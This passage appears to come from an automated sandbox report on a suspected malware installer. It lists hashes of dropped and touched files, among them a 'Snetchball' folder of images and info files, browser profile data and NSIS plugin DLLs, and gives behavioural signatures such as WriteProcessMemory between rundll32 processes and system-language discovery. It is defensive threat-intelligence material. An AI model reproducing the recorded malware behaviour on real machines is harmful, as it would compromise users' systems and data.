| SHA512 | 59c3642aaa5919a281f28a393d67e465d98cdd1061a0be305c4da715fd0c34e4813ae26b697a0783cc61177adcffd4f399d062cec4973ec24abbba4ac11cb6b5 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\2.jpg
| MD5 | 100c0f8e22bdb14b6121708de5c54aef |
| SHA1 | fd2f5413e1c67e9200b6e34f8c588164aecabb89 |
| SHA256 | 4657efc07f6e9f5f8a6b2138e49ef02465f3c787ec68744c902bae548f3c2c8f |
| SHA512 | d89543ab12aba6e074f315afb5a96222af591875c678e89e1ca5d8984230a0f8fb86302c6b08553dc949bbab1dcd381ed185a4e1e533a3ada834cca8f24411ab |
C:\Users\Admin\AppData\Roaming\Snetchball\images\3.jpg
| MD5 | 54feea87f970074d9b564ed59a68abad |
| SHA1 | 7d288be99bbd1c655b9df3de8c0d94468baa65c0 |
| SHA256 | 5b69f611d410240519d9b3d9b079a0f6befc9d7a1b4b4ccea8cf29189a9336ed |
| SHA512 | 7c1e7beb2b2148876ea04773840de455b84cc34046756efb4c304153fcee5591dd187bef4ec02275bf6a3ca0ccf8cfc636ca8042503c49177a73b5c923a646c4 |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8a12c93e8c700e17b8d5c8d606853492 |
| SHA1 | 7c1f517ae56d8ff1f04564036b22fc9fb004c45a |
| SHA256 | 204da1cb469083c12a88ffe3a057d76c76538cd083416d8de1ed8c65679135b7 |
| SHA512 | cb7a04a626696e19e42de6a336fa8b8136698237f73a28c51a9b0e7e121fdfbdc1ad2d5a533b49e21022bec0b11210813db4e58a6948393d6ef8556042415e39 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | 506fa0c2e22c8aabbeabc7bac4836167 |
| SHA1 | d3b72fe895a1a77d53108fb28b8d7e7c6c5abbf3 |
| SHA256 | a9b9713e13e6e7cbec64fa60ab12b31e775b26681b0f0d85b7e667dadb456758 |
| SHA512 | a0906f262b5fb362a949fab6630a2fdd245b109f112683db9528241b9bd4dfee93d8510d5932f7cb685ac32ceeb91daeadf7aec5586f64446470cd9b91ff8a57 |
C:\Users\Admin\AppData\Roaming\Snetchball\results\1_info_0.txt
| MD5 | 219ab43ee2780a5606a343bc33fbc00f |
| SHA1 | ea756707b518679bf778ad32a4f49a58c95773f0 |
| SHA256 | 2a50d0379509734dd325e48767abc05454d754581a4465866d5965f06827cc05 |
| SHA512 | 2dc4d8b268e1ead6ca9ee9d0b11d3c1cd82ba9197774e87aac518b51f1b8e4c4b2900a237b40feb5e31d2cb6842eef5c9a7c148d1126998220e56c16c42b4fc5 |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 9030924da5c745e8fea28854d5e3174d |
| SHA1 | 718e8ca05e5d8b9b8cd056670ece14b662426b03 |
| SHA256 | 5dd38be7d4ce7f21e9e6b479aa21d217d662a11f8453e2f697f53108c7e0edb2 |
| SHA512 | 58a310c349222878d9a40f2d738ac4d5d3532615386e03ef71252afd539a3f3532cdd232e9a84ace248c56c20fcdbe01297aa92b6ccdcfe55af43cf29b04623c |
C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt
| MD5 | 2f5cb85548e90c504ff0194b6cadc34d |
| SHA1 | 599372bfd59db58638cb8b7907a4ac8d6bcc097f |
| SHA256 | 1aed2b58f6e5a61e0a4ae2c79037d462bcf1630dc06d08d2d7efae608dd4c37a |
| SHA512 | fc93cef61e3523899531aea50cb8991df13d6fe66d3822d366ef9ba6fedfe3e4459a623c48936d652bd1b9830bee6aa7772b2cac009ddb9f4ec05007b4d6ae4d |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | 917a286378fdbe9d5c71a77837b6479f |
| SHA1 | 0ac7b62db98b79881c17e1dca9e23c312a7a8371 |
| SHA256 | 9a098642b9af0f45630b8d36cc428bc56d52f3365169d325bf3a61cfe9526217 |
| SHA512 | 20c7006208b0875d954d7d5e451d2174547b459dee6aaddfe2af83cdb93d91579b5dc2b37aa8be6a364ccb4b77db5e603ebc087e82e1d681aa1b5e9a26f5db58 |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity
| MD5 | a1d28bb360f4676bf337c9a91fe2d42a |
| SHA1 | 7eab7e696dceba53eb362353cdc52cb0b97ea442 |
| SHA256 | 15f7b5774db3f44960de73a922626415eefdcb7d811104946219efc77da6e9bd |
| SHA512 | e954f99549a2cc04fcc08b5ddd12804f2caf741f415fadeafe64771bcedf2a437ae51c76f403f23e8ad9a0a164fed311d18661cdb9feccd666404bd2928577ca |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Network Persistent State
| MD5 | 71c511c10844db2e7abbd456b3645cb4 |
| SHA1 | 57a087c8ee07c00f7fd67f622d596fd83549a1d5 |
| SHA256 | 63192a4035d848897e07c20e9efafd18d680c10dc3d5480b09cc879e68d45e5d |
| SHA512 | e3ee700871081699c44479324b1feec95736e50ee5f74963572b218fcff5591bbb06c12044fd2a0b13a9d4ce3be7762069cdec2496dd1811cf185e998711355e |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 7948b3bfa665c931a6dcff5d60ae0284 |
| SHA1 | 8354a73fcfe4f3c20eb766dc313b6cb97fe5c1ca |
| SHA256 | bd1a6bb34afaa1e32a0976918f49ce975817e41cd3efcf941ea29fb0a54a5a21 |
| SHA512 | ab30c3cf52915e36ed7fc77712acd92b6e06cd775714b1f68c2cfc9d541dfb3320b87e11beeb7a382675ee034b8e46a56eea7df39642603c1cd129d7c5e92992 |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State
| MD5 | cd7e894b0faa7e643d710351e564ddd1 |
| SHA1 | 086702051c8b7948e98d556ba7210737600d672c |
| SHA256 | d153530d0f7d05d3bcc29067b0fea2fda401ef01253403d30d1796a373bd1f94 |
| SHA512 | 68386751dd3f85db705a2062b07a3b83ce251c77eb54d93fac0202e1a60c6f6151ec672e8d5f939aef0057b1f1390d694f3ddaa5a7a96fd1b195b44ab723b9b0 |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Preferences
| MD5 | 91dec3d260cbf4f8fab4c3115969e8fb |
| SHA1 | 5d8e1f5ce3287aaaaf9f5974f81029eb5c19be96 |
| SHA256 | af1f58a05a2ee065732f244a1685a8ca2a6bd2220155943e31c986e293e4ab2e |
| SHA512 | 3f7be6f86c744899dc3e3fe9c9709ece586d18af9afa2eed9d23b4ef85d95ad6461be7cd2616cb3462c991b2650a5840539b3f927d9417380d6565118a8815a1 |
C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt
| MD5 | 046f7121434b586f3f1d2b1d8c8384d6 |
| SHA1 | 17b5a08ac4c9e1e82423e445da645866199877af |
| SHA256 | 791511e409e80fad609d0ade963a29a4779d64f6b8207b325c65e9ad4ca332ce |
| SHA512 | a6253bc5ecd900dced3e43d1e333df0eab07cf5a2baa43992a2f3fe8e336ac2dce0c41eeafc5daabd495e0c8ec1c4276a885b3e860caf33c25d4ec412b8ad268 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | 269225983ae322ac3fccf0c9a73bf42b |
| SHA1 | f50796253f0a1f4e10b9519bce87f4ed4a3af8c6 |
| SHA256 | 49c704ccfc2f4d15fa7cc9ea31be4cd362b3b65c7f1e858118197668b142126d |
| SHA512 | a4a5ab388372d54d9906c8dd25e60cf1163960c8680a9c80d801078f404c0313d9a8dd5b252fd88a2882a03545573791a83a8358a2be38820295852d27ad5c34 |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index
| MD5 | f2f64f8047e852f51ed52e1e7cf5be45 |
| SHA1 | 8ac4cab72d348dff1fd312fe14fbb8c4b4eb9df5 |
| SHA256 | 79e6d9f9f35f59fa8ee83e5894afa585ac207c1eeb17c9a20597d904bd840fe9 |
| SHA512 | d9de23c88ee10d7f715c3a3c278379a2c7db1b55b3fb22ed3fb3e29e0d6ec904f3450157a5440660acd019033185e40040ab91bd0335138a8739eddfa25b4bd6 |
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\manifest.json
| MD5 | 3bc960cfeaf829a56df1c4cf358d4de0 |
| SHA1 | 0a04642aba38d4505194e13fbbc7d07d62aa9dd7 |
| SHA256 | 5a0ad282948bb4ffc4d9f999b1be91416396240876c2292abb4004cd44eed1ce |
| SHA512 | 3cc8265ffc0176b8e11b7b207640af74081c852007aa0befef465429cd1befb9b9ea3b53d15d4d24a4b061b50216bdf63af7dcc471daf2056fbc9ded02aec61a |
C:\Users\Admin\AppData\Local\CEF\User Data\WidevineCdm\4.10.2830.0\LICENSE
| MD5 | f6719687bed7403612eaed0b191eb4a9 |
| SHA1 | dd03919750e45507743bd089a659e8efcefa7af1 |
| SHA256 | afb514e4269594234b32c873ba2cd3cc8892e836861137b531a40a1232820c59 |
| SHA512 | dd14a7eae05d90f35a055a5098d09cd2233d784f6ac228b5927925241689bff828e573b7a90a5196bfdd7aaeecf00f5c94486ad9e3910cfb07475fcfbb7f0d56 |
C:\Users\Admin\AppData\Local\CEF\User Data\LocalPrefs.json
| MD5 | 7640d75722eac88252e59da7e78e9809 |
| SHA1 | 9ad92d6bbb63630c839e103e4749dbfe3a4c4724 |
| SHA256 | 880d12161b536bfe14e942d1bce43884dc57bc875999c798dbd3277419f55269 |
| SHA512 | bd8482be05a8d94054bcccda04ce5c9fa2505e8abc764536ae03d4ff7b2666f3be55f2dc2ef8f0f08b6d84b9095f8e90b97e82ec5d8a8ba8af1babf5ad651f6a |
F:\Games\The Longing\The Longing_Data\level10.resS
| MD5 | 717c6d424b85a31a68caeabf1ff58aac |
| SHA1 | 28ce889eda9a20f3a6d8206bf365b6f33494325c |
| SHA256 | ff788b7781a6d40f99d9d0dfd688dbf5dca187691beb6f5adedf88708e336e7f |
| SHA512 | 55e415cd3755069e19966762f028f5ec735c26232c2e1ec424e17c3b9042bde1cd43bf304ac34ce5d5f7c666c72f543f97a6fcf92ee35f39fcb055b0dd2257a3 |
F:\Games\The Longing\The Longing_Data\sharedassets10.assets.resS
| MD5 | c33a7c640e9458ad4bd4755d5a984e9e |
| SHA1 | 05c513dd0e066c2ee4d1b8ebe4a937109abc636b |
| SHA256 | baf57d94373570530be6436640a8d94b7d83f924eb434d1c7ec3d13f991c83ff |
| SHA512 | b8e328c5072d4159d92c1f279986c9a07efc18c30f95bb79f1549ee8806164abb68a5a36699a2ea9beb974de11e584bc22873de5c5e4cd014a2c5e8947301366 |
F:\Games\The Longing\The Longing_Data\sharedassets6.assets.resS
| MD5 | bbc8a3dbd8f350526ebd98d7d1a82554 |
| SHA1 | 3c56ac2c53823646abad240355c2573863f2fa5f |
| SHA256 | e255bf1a4a6e5c873a0e7a6be4fbf3bcb60a605ce377e40f0d3466477b23e347 |
| SHA512 | 1edde2853664c8f0d458eb27f57b09a51e8a4858db2c04a8656b6b8b1ee7998bfa3eac447e0be9ccfaf8642c4455723b75975968b6e53df681301ebcf8ac819e |
F:\Games\The Longing\The Longing.exe
| MD5 | a294ab7a1968d5d62e899b91e457a941 |
| SHA1 | f6ad540ee8a308808e5750454a5a714341a7306a |
| SHA256 | eee2703c14decda7a4a79104935db6c908cf361837a3244e03b7d00c8c887b14 |
| SHA512 | dd28a8fc0b8b8470473fe3f2da8d2997c59998ed0ac73f96e0cd3bb3474463c7e5ca034209489d4e280c82cceb7fce69962815069c35a89cf751dc0d1753bf20 |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity
| MD5 | aef58b997e798bbe4d6c319bc669dfcd |
| SHA1 | ccab47b75316a7ed49ad404867ede6882ee91ea1 |
| SHA256 | 9d76ec115140ae617062d5e7e527b1fb7a38d1d24265ee5547fa82a4b0879dc2 |
| SHA512 | 45ad0f1c52ce73e220a845f70e0e21cb9cb7e4a4186068948d57f74b05d7f3e216be671c6bdb60e73966d938c009df5c4c6b56374af35ad5e7b4933d4260d27b |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Network Persistent State
| MD5 | 779efa7324b149e8ea609ddbfa59e97c |
| SHA1 | 058ce1f98baecbc2bf5fd3f4e145cf33440a1dad |
| SHA256 | 1b9193a77a87299400ced876db4b402d2868567d07353240a0fec43319334a48 |
| SHA512 | c9a4b37f0da92f978c46d104f0ad49e8c3183fd55212b63f57679ede77d9b2b692e1e58fc6120002fbbac403cc4e4d02d9c926baa97559109506bb5127da6b3f |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ef7286289b65b75eec42f536c13911dc |
| SHA1 | 887bb080ce134be21a6ae19fa84bf5d0ff4dda3a |
| SHA256 | 2bce140ee18a901fb8cfae1e9ddea5382b347c1ce299de0d79059af1b3d738f0 |
| SHA512 | b10b68dc6e6e6aa9ce8da6337c97130a21c09074a54701713109a71372d139809559b27d5ef0509080407a45e9aebd199ca41adaa3cfaafca3bd0196ba7833ad |
C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 0ef9a6d3297411fd02d96aec83b45a78 |
| SHA1 | 78a966fafca14e5d484a95c09f8d1d6bd14a5ebb |
| SHA256 | 1b432d0cdb8a0bc8283927f9824f2f8fa2a1c607c1569461ee9e7c5b7e123be4 |
| SHA512 | 5945d08ac678866123a5919ad5a35b80bb3c0c911cf6a3d2e1104df56de9f7a41bdb8b58a5eae9c473102dc7efcd486927a12820fb6ea003c59016b6eb54bcd1 |
C:\Users\Admin\AppData\Local\D3DSCache\e067532ca9807a39\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\scoped_dir6244_557721920\9ae68f57-e52b-46d8-a6a8-53a93f537dda.tmp
| MD5 | da75bb05d10acc967eecaac040d3d733 |
| SHA1 | 95c08e067df713af8992db113f7e9aec84f17181 |
| SHA256 | 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2 |
| SHA512 | 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef |
C:\Users\Admin\AppData\Local\Temp\scoped_dir6244_557721920\CRX_INSTALL\_locales\en_CA\messages.json
| MD5 | 558659936250e03cc14b60ebf648aa09 |
| SHA1 | 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825 |
| SHA256 | 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b |
| SHA512 | 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 288b1f568920cc645f4a321e362bfad8 |
| SHA1 | 03e1b2b14725393b97341fa63982f882650deac5 |
| SHA256 | 64657ec88a32b6167f9bee37fadd8dcfefd5e75d9191adf31c63453db769bcc2 |
| SHA512 | b521fdba738bf5cf1cb087a765697fb909489292929c85024329d575df1b9571f9c4065bfff2ee94f2cb92e7c8aac58552f670c8010b6c3a604c9f29c9e81e9a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json
| MD5 | 4ec1df2da46182103d2ffc3b92d20ca5 |
| SHA1 | fb9d1ba3710cf31a87165317c6edc110e98994ce |
| SHA256 | 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6 |
| SHA512 | 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json
| MD5 | 07ffbe5f24ca348723ff8c6c488abfb8 |
| SHA1 | 6dc2851e39b2ee38f88cf5c35a90171dbea5b690 |
| SHA256 | 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c |
| SHA512 | 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | ef9b8417923f7c6387ac6b9d9d0cca2e |
| SHA1 | fe2c01767a3f5b338d9aff198e7c18089bb4a28a |
| SHA256 | 5b6f0036e9229371f48e816eeb8c018d43bd020f53836f6026db95355ebad202 |
| SHA512 | 91eb5f7b41e7395e274cfea1e00b8177570edd7c5751b36ed4717b9027dd2a5d6a93c30966cbb08cf076500e43e59002f3cb412cd4eb562003bf9f2484d0f695 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d579e459a5d9dfc0c080b87b1b00ecec |
| SHA1 | 360814f7b6ea088fbaa81d307efbc281ecfadbd2 |
| SHA256 | f965c262ffedaf003a70317de8134d7f7caac66b38bdfcd9943b7a9e54f305fe |
| SHA512 | 896c6ff7282500abbde3c26bd6c078aca945fa9eb941065971e191136786f3fc5fe65a99f6521226eace514a661df33ed074cfe57fb9267793d9b56ded87e6d3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 675473985c861d7a735106d105a5c762 |
| SHA1 | 98d3b0a8ab879201445027d27f86758cd9710327 |
| SHA256 | bfa4cdbb93efce70a489adfb9c8610947ccf7c18e294851e23f1154c4cbb8477 |
| SHA512 | a25b12ba440954f08474d3e23a8edd5467ac814453866a4b065d0ee9a18d63352ea9cdcbeb4d8b77d457cceed97d2cda85e204d0f6f43f7257ea20cdffa2fba4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00005e
| MD5 | 1b54b70beef8eb240db31718e8f7eb5d |
| SHA1 | da5995070737ec655824c92622333c489eb6bce4 |
| SHA256 | 7d3654531c32d941b8cae81c4137fc542172bfa9635f169cb392f245a0a12bcb |
| SHA512 | fda935694d0652dab3f1017faaf95781a300b420739e0f9d46b53ce07d592a4cfa536524989e2fc9f83602d315259817638a89c4e27da709aada5d1360b717eb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | d6b66962e9c50f33149bc9139ecd915f |
| SHA1 | bebb45a386abd3f69ba48101eebea63bb2615afa |
| SHA256 | 3a1697c5521eee300223bba7313ecba1e3c07d79992fa92b44deaef56ad4622c |
| SHA512 | b04f32b6eda0c7c4e80edadf566edb24546e9eb4adcf13a0174f303e15992a0602d9462d2c2f6f7735d705e6667bb4f16c497b6de21eaefb72f4d8f77980601a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f6a20e0a3f18b39b50ee96e8ac762abc |
| SHA1 | ca8c5b8d8b1d5010f1949d6235b8d928a67fca39 |
| SHA256 | 0cb7b9fe88b0fd8533dfd133d26337e71875f4d232e4bcc1d732c1b32092663e |
| SHA512 | 3f98c5356b2233ca229925888c97946183951ebdb22bda93ef977c96ca7123031c7a4eefbd4fbf1aa121dee10164e516840a7538917a97af49fd4752d0553e74 |
C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\nsDialogs.dll
| MD5 | 4e5bc4458afa770636f2806ee0a1e999 |
| SHA1 | 76dcc64af867526f776ab9225e7f4fe076487765 |
| SHA256 | 91a484dc79be64dd11bf5acb62c893e57505fcd8809483aa92b04f10d81f9de0 |
| SHA512 | b6f529073a943bddbcb30a57d62216c78fcc9a09424b51ac0824ebfb9cac6cae4211bda26522d6923bd228f244ed8c41656c38284c71867f65d425727dd70162 |
C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\nsProcess.dll
| MD5 | 08072dc900ca0626e8c079b2c5bcfcf3 |
| SHA1 | 35f2bfa0b1b2a65b9475fb91af31f7b02aee4e37 |
| SHA256 | bb6ce83ddaad4f530a66a1048fac868dfc3b86f5e7b8e240d84d1633e385aee8 |
| SHA512 | 8981da7f225eb78c414e9fb3c63af0c4daae4a78b4f3033df11cce43c3a22fdbf3853425fe3024f68c73d57ffb128cba4d0db63eda1402212d1c7e0ac022353c |
C:\Program Files (x86)\Steam\Steam.exe
| MD5 | 33bcb1c8975a4063a134a72803e0ca16 |
| SHA1 | ed7a4e6e66511bb8b3e32cbfb5557ebcb4082b65 |
| SHA256 | 12222b0908eb69581985f7e04aa6240e928fb08aa5a3ec36acae3440633c9eb1 |
| SHA512 | 13f3a7d6215bb4837ea0a1a9c5ba06a985e0c80979c25cfb526a390d71a15d1737c0290a899f4705c2749982c9f6c9007c1751fef1a97b12db529b2f33c97b49 |
C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\nsExec.dll
| MD5 | 2095af18c696968208315d4328a2b7fe |
| SHA1 | b1b0e70c03724b2941e92c5098cc1fc0f2b51568 |
| SHA256 | 3e2399ae5ce16dd69f7e2c71d928cf54a1024afced8155f1fd663a3e123d9226 |
| SHA512 | 60105dfb1cd60b4048bd7b367969f36ed6bd29f92488ba8cfa862e31942fd529cbc58e8b0c738d91d8bef07c5902ce334e36c66eae1bfe104b44a159b5615ae5 |
C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\modern-wizard.bmp
| MD5 | 3614a4be6b610f1daf6c801574f161fe |
| SHA1 | 6edee98c0084a94caa1fe0124b4c19f42b4e7de6 |
| SHA256 | 16e0edc9f47e6e95a9bcad15adbdc46be774fbcd045dd526fc16fc38fdc8d49b |
| SHA512 | 06e0eff28dfd9a428b31147b242f989ce3e92474a3f391ba62ac8d0d05f1a48f4cf82fd27171658acbd667eaffb94cb4e1baf17040dc3b6e8b27f39b843ca281 |
C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\System.dll
| MD5 | a36fbe922ffac9cd85a845d7a813f391 |
| SHA1 | f656a613a723cc1b449034d73551b4fcdf0dcf1a |
| SHA256 | fa367ae36bfbe7c989c24c7abbb13482fc20bc35e7812dc377aa1c281ee14cc0 |
| SHA512 | 1d1b95a285536ddc2a89a9b3be4bb5151b1d4c018ea8e521de838498f62e8f29bb7b3b0250df73e327e8e65e2c80b4a2d9a781276bf2a51d10e7099bacb2e50b |
C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\StdUtils.dll
| MD5 | db11ab4828b429a987e7682e495c1810 |
| SHA1 | 29c2c2069c4975c90789dc6d3677b4b650196561 |
| SHA256 | c602c44a4d4088dbf5a659f36ba1c3a9d81f8367577de0cb940c0b8afee5c376 |
| SHA512 | 460d1ccfc0d7180eae4e6f1a326d175fec78a7d6014447a9a79b6df501fa05cd4bd90f8f7a85b7b6a4610e2fa7059e30ae6e17bc828d370e5750de9b40b9ae88 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | fd0f91946d25cbc1feb54dbf3801a17f |
| SHA1 | 9ada02d04e9fbd41a0d5a6f516fda6ed3731f6cc |
| SHA256 | 578309e7a4dbd6f2a3fefbcc64ac6d9486b3332bd723ca7c405f695dfe4835aa |
| SHA512 | ab364d5b08231e3b6f00b5e754cd0115a5a4a9a3d0a71d12229855dd656f2693ff949ac3996399e4449fa1afda4f1f35ec2198aebfeb3e3e7924c8cf0d4d6758 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 38bdcadd2fd29e1587172b3e35947b1c |
| SHA1 | 3a79d58acc7fe4617672b3db061a1d6701ae2d0c |
| SHA256 | 2a5a4695d1ee967f86490b22fb0d515b8c609c17915934fb958491dee449edc6 |
| SHA512 | 97bfea65b56f02803b5f241960d9a4116ef9c82fabf98a6fa1a76f1abc5692e3d6c2e1e3d9cb6fc1a4f6345088b6da87007c264b8c5df6fc1fb1327b11815ca8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 47f5306d288a583fb62d9f7601d97c27 |
| SHA1 | b05a63fc2ef61fbaec13e61c9f8f4b135bd9c1ef |
| SHA256 | 0b6212060b72d7d3b50d4f49ff78785aa23a79164120e820a7821f67a4d1cfef |
| SHA512 | c1b9522186f8f574e28596b3a6c8d348ffd5a2ef38c56ae81667a2259f3e6840421b26c9846f90ce8d484260ed70cd5649363c1cea0caabe8cf6058dfbd27b22 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 8751145962fda5fa06e95fa462896587 |
| SHA1 | 4f19a6b9188d29f430836a0639790da84fa0bfaf |
| SHA256 | 9380f7f59cd92b176013e7b3eeab5253d7d8d03bd302892fff3f0c22d2c3b0a0 |
| SHA512 | 6681cae3043e7e5b402e2fb811b1664f47aa82a27a13e1d42e23f682854ca68c17455dbf117d815ac82ea9848f87dc0c39705257fccc2753c87a7347acf4863a |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-15 03:46
Reported
2024-11-15 03:49
Platform
win11-20241007-en
Max time kernel
91s
Max time network
94s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3552 wrote to memory of 1952 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3552 wrote to memory of 1952 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3552 wrote to memory of 1952 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 1952 -ip 1952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 488
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-15 03:46
Reported
2024-11-15 03:50
Platform
win11-20241023-en
Max time kernel
146s
Max time network
152s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4008 wrote to memory of 4768 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4008 wrote to memory of 4768 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4008 wrote to memory of 4768 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4768 -ip 4768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 460
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-15 03:46
Reported
2024-11-15 03:49
Platform
win11-20241007-en
Max time kernel
91s
Max time network
94s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
